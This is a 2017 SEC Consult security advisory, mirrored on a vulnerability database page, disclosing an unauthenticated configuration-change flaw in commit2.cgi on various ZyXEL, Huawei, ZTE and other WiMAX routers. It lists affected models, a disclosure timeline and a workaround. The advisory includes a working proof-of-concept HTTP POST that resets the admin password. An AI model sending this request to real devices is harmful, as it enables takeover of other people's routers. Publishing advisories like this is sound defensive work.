Lucene search
K

WiMAX CPE Authentication Bypass

🗓️ 07 Jun 2017 00:00:00Reported by Stefan ViehbockType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 63 Views

WiMAX CPE Authentication Bypass impacting various vendors and products. Remote attacker can bypass authentication and set arbitrary configuration values without authentication. No fix available. Restrict network access from WAN as a workaround

Code
`We have published an accompanying blog post to this technical advisory with  
further information:  
http://blog.sec-consult.com/2017/06/ghosts-from-past-authentication-bypass.html  
  
SEC Consult Vulnerability Lab Security Advisory < 20170607-0 >  
=======================================================================  
title: Various WiMAX CPEs Authentication Bypass  
product: see "Vulnerable / tested versions"  
vulnerable version: see "Vulnerable / tested versions"  
fixed version:  
CVE number:  
impact: Critical  
homepage:  
found: 2016-08-22  
by: Stefan ViehbAPck (Office Vienna)  
SEC Consult Vulnerability Lab  
  
An integrated part of SEC Consult  
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow  
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich  
  
https://www.sec-consult.com  
  
=======================================================================  
  
Vendor description:  
-------------------  
Various vendors are affected. See "Vulnerable / tested versions".  
  
  
Business recommendation:  
------------------------  
SEC Consult recommends to decommission affected devices.  
  
  
Vulnerability overview/description:  
-----------------------------------  
Various WiMAX CPEs are vulnerable to an authentication bypass. An attacker  
can set arbitrary configuration values without prior authentication.  
The vulnerability is located in commit2.cgi (implemented in libmtk_httpd_plugin.so)  
  
  
Proof of concept:  
-----------------  
The following HTTP request sets the admin username and password (configuration  
ADMIN_PASSWD) to "admin".  
An attacker can now login in with admin permissions.  
  
POST /commit2.cgi HTTP/1.1  
Host: 1.2.3.4  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 47  
  
ADMIN_PASSWD=$1$ZZ0DVlc6$QLqFLzW8YDZObgHtMZrYF/  
  
  
Vulnerable / tested versions:  
-----------------------------  
The vulnerability was found in the firmware of various WiMAX CPEs.  
A list of "likely" affected products is below. The firmware of these products was  
developed by ZyXEL and is likely based on the MediaTek SDK.  
  
The relation with Huawei, ZTE, MADA etc. is not clear, possibly ODM/OEM/OBM.  
  
GreenPacket OX350 (Version: ?)  
GreenPacket OX-350 (Version: ?)  
Huawei BM2022 (Version: v2.10.14)  
Huawei HES-309M (Version: ?)  
Huawei HES-319M (Version: ?)  
Huawei HES-319M2W (Version: ?)  
Huawei HES-339M (Version: ?)  
MADA Soho Wireless Router (Version: v2.10.13)  
ZTE OX-330P (Version: ?)  
ZyXEL MAX218M (Version: 2.00(UXG.0)D0)  
ZyXEL MAX218M1W (Version: 2.00(UXE.3)D0)  
ZyXEL MAX218MW (Version: 2.00(UXD.2)D0)  
ZyXEL MAX308M (Version: 2.00(UUA.3)D0)  
ZyXEL MAX318M (Version: ?)  
ZyXEL MAX338M (Version: ?)  
  
It is _very likely_, that other products are affected as well.  
  
On some devices remote HTTP/HTTPS administration via the WAN connection is  
enabled.  
  
  
Vendor contact timeline:  
------------------------  
2016-09-09: Sending advisory draft to Huawei PSIRT.  
2016-09-09: Huawei confirms receipt of advisory. Starts investigation.  
2016-09-23: Huawei states that affected products are End of Service (EOS) since  
2014.  
2016-10-08: Sending questions regarding other affected vendors and relation to  
the vendors.  
2016-11-22: Huawei states that they cannot share requested information.  
2017-04-04: Informing CERT/CC.  
2017-06-07: Coordinated release of security advisory.  
  
  
Solution:  
---------  
None available.  
  
  
Workaround:  
-----------  
Restrict network access to the web interface from WAN.  
  
  
Advisory URL:  
-------------  
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
SEC Consult Vulnerability Lab  
  
SEC Consult  
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow  
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich  
  
About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It  
ensures the continued knowledge gain of SEC Consult in the field of network  
and application security to stay ahead of the attacker. The SEC Consult  
Vulnerability Lab supports high-quality penetration testing and the evaluation  
of new offensive and defensive technologies for our customers. Hence our  
customers obtain the most current information about vulnerabilities and valid  
recommendation about the risk profile of new technologies.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://www.sec-consult.com/en/Career.htm  
  
Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Mail: research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
EOF Stefan ViehbAPck / @2017  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation